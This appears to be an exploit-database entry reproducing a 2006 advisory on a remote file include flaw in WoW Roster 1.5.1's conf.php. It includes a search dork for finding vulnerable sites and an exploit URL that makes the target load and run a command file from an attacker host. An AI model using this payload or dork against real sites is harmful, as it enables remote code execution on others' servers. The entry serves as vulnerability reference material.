header-logo
Suggest Exploit
vendor:
WoW Roster
by:
Skulmatic
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: WoW Roster
Affected Version From: 1.5.1
Affected Version To: 1.5.1
Patch Exists: YES
Related CWE: N/A
CPE: a:wow_roster:wow_roster
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

WoW Roster <= 1.5.1 Remote File Include Vulnerabilities

A vulnerability exists in World of Warcraft (WoW) Roster, which allows a remote attacker to include a file from a remote host that is outside of the intended system's path. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system. The vulnerability is due to insufficient sanitization of user-supplied input to the 'subdir' parameter in the 'conf.php' script.

Mitigation:

Input validation should be used to ensure that untrusted input is rejected. Additionally, the application should be configured to use the least privilege necessary to perform its function.
Source

Exploit-DB raw data:

--------------------------------------------------------------------------------
Title : WoW Roster <= 1.5.1 Remote File Include Vulnerabilities
###############################################################################
Discovered By Skulmatic
-----------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application :  World of Warcraft (WoW) Roster
URL :  http://www.wowroster.net/
-----------------------------------------------------------------------------

dork        : "wow roster version 1.5.*"
Exploit     : 
http://[target]/[wow_roster_path]/conf.php?subdir=http://[attacker]/cmd.txt?&cmd=ls           
              
------------------------------------------------------------------------------

greatz:
~~~~
# special to song hye kyo (for inspiration)
# To all members of #papmahackerlink and #hackid, OLiBekaS, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster.
-------------------------------------------------------------------------------

Contact:
~~~~~~
Nick: skulmatic
E-mail: skulmatic[at]gmail[dot]Com

--------------------------------- [ eof ] ---------------------------------------

# milw0rm.com [2006-08-01]

Navigation

Suggest Exploit

Services By CQR